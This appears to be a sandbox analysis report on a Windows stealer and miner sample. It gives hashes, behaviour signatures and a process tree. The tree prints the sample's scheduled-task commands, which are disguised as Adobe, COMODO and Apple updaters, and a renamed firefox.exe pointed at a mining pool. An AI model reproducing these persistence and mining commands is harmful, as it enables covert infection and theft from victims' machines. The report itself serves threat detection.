Overview

overview

8

Static

static

e90981b9b7...89.exe

windows7_x64

8

e90981b9b7...89.exe

windows10_x64

8

Analysis

  • max time kernel
    65s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    13-05-2021 12:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589.exe

  • Size

    2.6MB

  • MD5

    b9778cfed374bca17cb377d2013f7354

  • SHA1

    97f509d17326ef9be6392cd103b64b469bef6a68

  • SHA256

    e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589

  • SHA512

    f5ec5cdccb1658f0ad9c783ae502e42a5af0e43a42201a8cafdfa452266e06d978781fc0aebce332b5acbbab7031bf15b2882497f454502e59e932fae730a6ff

Score
8/10
persistencespywarestealer

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Modifies Installed Components in the registry 2 TTPs
    persistence
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 16 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 36 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589.exe
    "C:\Users\Admin\AppData\Local\Temp\e90981b9b7785da5ad7d0322a45c1cbbc2592aa404ffa51d97b12a950b030589.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *
      2⤵
        PID:1764
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *
        2⤵
          PID:1200
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *
          2⤵
            PID:1324
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 18 /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jre7\lib\applet\AdobeARM.exe\""
            2⤵
            • Creates scheduled task(s)
            PID:1884
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 18 /TN "COMODO" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\CLPSLA.exe\""
            2⤵
            • Creates scheduled task(s)
            PID:1528
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 31 /TN "Apple Push" /TR "\"C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\APSDaemon.exe\""
            2⤵
            • Creates scheduled task(s)
            PID:304
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 21 /TN "AutoUpdate Monitor" /TR "\"C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\almon.exe\""
            2⤵
            • Creates scheduled task(s)
            PID:1020
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AdobeARM.exe\""
            2⤵
            • Creates scheduled task(s)
            PID:968
          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
            C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
            2⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Enumerates connected drives
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:324
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *
              3⤵
                PID:480
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *
                3⤵
                  PID:916
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *
                  3⤵
                    PID:1064
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 12 /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jre7\lib\applet\AdobeARM.exe\""
                    3⤵
                    • Creates scheduled task(s)
                    PID:944
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 31 /TN "COMODO" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\CLPSLA.exe\""
                    3⤵
                    • Creates scheduled task(s)
                    PID:1072
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 16 /TN "Apple Push" /TR "\"C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\APSDaemon.exe\""
                    3⤵
                    • Creates scheduled task(s)
                    PID:848
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 23 /TN "AutoUpdate Monitor" /TR "\"C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\almon.exe\""
                    3⤵
                    • Creates scheduled task(s)
                    PID:1336
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Adobe ARM" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AdobeARM.exe\""
                    3⤵
                    • Creates scheduled task(s)
                    PID:1640
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 2 -m512
                    3⤵
                      PID:2000

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AdobeARM.exe
                  MD5

                  0dbd0ffd68b03a897c6ff755c2ae91b2

                  SHA1

                  1c6d2b725ebbe8d06083249556511f92844c1f5b

                  SHA256

                  8b4e4364f3aa1dce892099cdbb19693f8f06b0dfb53e3e86da900f7e7135e04d

                  SHA512

                  7fc882589ec9d313f77246f848ad1c986cd0869947f7b91093ce077eeef40cb9da3f825c128ecfb4034505815a5ccf27a7337584fa774b879d1693b21ba18d46

                  Download Submit

                • C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\CLPSLA.exe
                  MD5

                  40ebed87b0ad02454ee98207642a9cca

                  SHA1

                  c91bb7676d8c9f0fbece7dd1db910716475a8431

                  SHA256

                  168915047fa66a3fc02e3929ad2e02bf4208562fc142438e67182798060f71f3

                  SHA512

                  0fa979e886cd62b4bf33da312b12c8e1a7d5c903aea2131697f811e86fddad9a947a76176d8dac7e1c8fad648dcf3de1f5e11afd6d4e613371a5c9f650301852

                  Download Submit

                • C:\Program Files\Java\jre7\lib\applet\AdobeARM.exe
                  MD5

                  14054c0ed50b0bc2ca036927549bc091

                  SHA1

                  bb89587eb172da1ebe2f5c52fe0aa12257e63aa8

                  SHA256

                  3152994d6612aebffad3e7b826e59c850ae10d44a96b25723898ff8bcd5ce799

                  SHA512

                  af37abd96612388fe26ef8fbd665b05c9fd860707a4ca16f5fb796f847e804e5dd103b496679fb3b861538681ac72fcabe6072d2bd68b3c9a0c14c6a5d682af4

                  Download Submit

                • C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\almon.exe
                  MD5

                  d93ba84d8f1251c4cbd86741a9e5b1c6

                  SHA1

                  11e6d8900790b24537cbeeb29f7968e9797497e3

                  SHA256

                  61971fdb81427376ff7458f6597a3d8ab6be50eb8704ae39670158c03a3cc9b8

                  SHA512

                  dd6a93957d8391b4813345515fcf0eb050a0cc62c2c39b13a9c5f15faac6fb2281f0369c2b38755e60d410b25466ee9a2faf986b1d83440db45784524fd1fe86

                  Download Submit

                • C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\APSDaemon.exe
                  MD5

                  a8511cfd452daefd910940a831f463c1

                  SHA1

                  0c54967fea6d65423e13b52585456ef1e0ff18b0

                  SHA256

                  6c966c03432a6b68161bad62c8d92fa2be0955211e9b05ee5b6b1223d51bbc7c

                  SHA512

                  e63dd762bb3ac0acd02404ae996e424fc041be2f7627c9bfc5d8088a9c0e591e638392484636ab7d34bd9d4546288bdf429d1cbf2a6986b20d015430fd955748

                  Download Submit

                • C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\CLPSLA.exe
                  MD5

                  83c26d7811e31f1f81f6435b0453c764

                  SHA1

                  35f9dd13d0a1780d91cdf42b33d5bb4ac64e2b3d

                  SHA256

                  b6ececf1ab843d547090398fc879e82a17d64f2d0149efb0383cd2c8d1884e7f

                  SHA512

                  cd17bd8e139e0dcef8ed15186266af3d0c8266108fb237355c92e1f338febd69a8c824edb881ad0d59b5124de8fe28c2dcda7a984e8f04dbccf03584afb90a94

                  Download Submit

                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\plugin-container.exe
                  MD5

                  358543e4f30b2e404cd07cfcbeb3bdcf

                  SHA1

                  16b6c6281ad16b29c2ae16548c227ecb5882ecc2

                  SHA256

                  d835ecf31e5c99eb44536b93b7d3028abffc9e52ac62796e53fb1771ded89b7f

                  SHA512

                  815945b5d2aa4e303df7dc6fdffef8ab41792587f1a8268ec251cbc5f046c197e210cf539fb53f3397df427bc3191fac47c2d943b4626cf917e8d13bf3a0b766

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
                  MD5

                  e357b6c1f4bf94bef2059393af3c0888

                  SHA1

                  d998a55c2fdb7dd928acf565017c0688d7320534

                  SHA256

                  af8378513be1aebcfded181025feae7c3aa9f59d92382fd4767e2c1fc783a301

                  SHA512

                  278ab01a109435993688db67a84d7dc5b455dd5233b19f7fef708313c32423e2db04ea75499a21ff6757b7985808734cfae892c4dca383cb8692589d3bee8332

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
                  MD5

                  e357b6c1f4bf94bef2059393af3c0888

                  SHA1

                  d998a55c2fdb7dd928acf565017c0688d7320534

                  SHA256

                  af8378513be1aebcfded181025feae7c3aa9f59d92382fd4767e2c1fc783a301

                  SHA512

                  278ab01a109435993688db67a84d7dc5b455dd5233b19f7fef708313c32423e2db04ea75499a21ff6757b7985808734cfae892c4dca383cb8692589d3bee8332

                  Download Submit

                • \Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
                  MD5

                  e357b6c1f4bf94bef2059393af3c0888

                  SHA1

                  d998a55c2fdb7dd928acf565017c0688d7320534

                  SHA256

                  af8378513be1aebcfded181025feae7c3aa9f59d92382fd4767e2c1fc783a301

                  SHA512

                  278ab01a109435993688db67a84d7dc5b455dd5233b19f7fef708313c32423e2db04ea75499a21ff6757b7985808734cfae892c4dca383cb8692589d3bee8332

                  Download Submit

                • memory/304-67-0x0000000000000000-mapping.dmp

                  Download

                • memory/324-71-0x0000000000000000-mapping.dmp

                  Download

                • memory/480-77-0x0000000000000000-mapping.dmp

                  Download

                • memory/848-85-0x0000000000000000-mapping.dmp

                  Download

                • memory/916-78-0x0000000000000000-mapping.dmp

                  Download

                • memory/944-81-0x0000000000000000-mapping.dmp

                  Download

                • memory/968-69-0x0000000000000000-mapping.dmp

                  Download

                • memory/1020-68-0x0000000000000000-mapping.dmp

                  Download

                • memory/1028-60-0x000007FEFB701000-0x000007FEFB703000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/1028-61-0x0000000000B30000-0x0000000000B31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1064-79-0x0000000000000000-mapping.dmp

                  Download

                • memory/1072-83-0x0000000000000000-mapping.dmp

                  Download

                • memory/1200-63-0x0000000000000000-mapping.dmp

                  Download

                • memory/1324-64-0x0000000000000000-mapping.dmp

                  Download

                • memory/1336-87-0x0000000000000000-mapping.dmp

                  Download

                • memory/1528-66-0x0000000000000000-mapping.dmp

                  Download

                • memory/1640-89-0x0000000000000000-mapping.dmp

                  Download

                • memory/1764-62-0x0000000000000000-mapping.dmp

                  Download

                • memory/1884-65-0x0000000000000000-mapping.dmp

                  Download

                • memory/2000-91-0x0000000000060000-0x00000000000A7000-memory.dmp

                  Filesize

                  284KB

                  Download

                • memory/2000-92-0x000000000006BC40-mapping.dmp

                  Download

                • memory/2000-93-0x0000000000060000-0x00000000000A7000-memory.dmp

                  Filesize

                  284KB

                  Download